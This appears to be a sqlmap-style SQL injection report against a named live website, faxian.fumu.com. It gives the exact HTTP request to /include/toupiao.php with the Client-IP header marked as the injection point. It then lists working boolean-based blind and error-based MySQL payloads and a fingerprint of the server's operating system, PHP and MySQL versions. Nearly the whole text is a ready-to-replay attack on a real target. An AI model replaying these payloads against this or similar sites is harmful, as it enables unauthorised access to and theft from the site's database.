faxian.fumu.com
Injection:

GET /include/toupiao.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
Cookie: 6yBB_fa86_lastvisit=1384479513; 6yBB_fa86_sid=P9mnMe; 6yBB_fa86_lastact=1384483197%09faxian.php%09
Host: faxian.fumu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

Place: (custom) HEADER
Parameter: Client-IP #1*
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: ' RLIKE IF(9693=9693,0x436c69656e742d49502c2a,0x28) AND 'rGQy'='rGQy

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ' AND (SELECT 2979 FROM(SELECT COUNT(*),CONCAT(0x7162686671,(SELECT (CASE WHEN (2979=2979) THEN 1 ELSE 0 END)),0x717a697071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YJeP'='YJeP
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2
back-end DBMS: MySQL 5.0